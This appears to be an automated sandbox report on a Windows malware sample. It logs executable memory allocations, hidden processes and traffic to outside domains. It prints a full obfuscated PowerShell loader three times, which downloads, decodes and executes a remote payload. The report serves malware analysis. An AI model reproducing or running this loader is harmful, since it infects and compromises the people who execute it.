NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 30, 2024, 6:07 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;"
cmdline	POWERSHELL "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;"
cmdline	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fristadens.Til && echo t"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 30, 2024, 6:07 p.m.	show_type: 0 filepath_r: POWERSHELL parameters: "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;" filepath: POWERSHELL	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 30, 2024, 6:07 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received
Data received	F<html><head><title>400 Bad Request</title></head><body> <h2>HTTPS is required</h2> <p>This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.<br /> <blockquote>Hint: The URL should starts with <b>https</b>://</blockquote> </p> <hr /> Powered By LiteSpeed Web Server<br /> <a href='http://www.litespeedtech.com'><i>http://www.litespeedtech.com</i></a> </body></html>
Data received	F

Poweshell is sending data to a remote host (41 events)

Data sent	sofÑÄaWÅCs8ÕÑYó ¶&$ØA'ú±¡/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑÅ+cÞ¸AW:¸VV\|ïË:WF ëþ>qCñ/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑÉ¨ëÅþÞkxÁüII;Âî\æóa¿u ÷/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑÊ»&úÒïúØLå¦·fðc°7"àå/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑÏB ±ÀÓ´æFr&¢öLËÕy2âNù/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑÏ¼4¼CÓle!6HND "æ0xìwç#/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑÔÓd*´^PüâØñ[K ¬Ëã¾/5 ÀÀÀ À 28.ÿtricotexbacau.ro
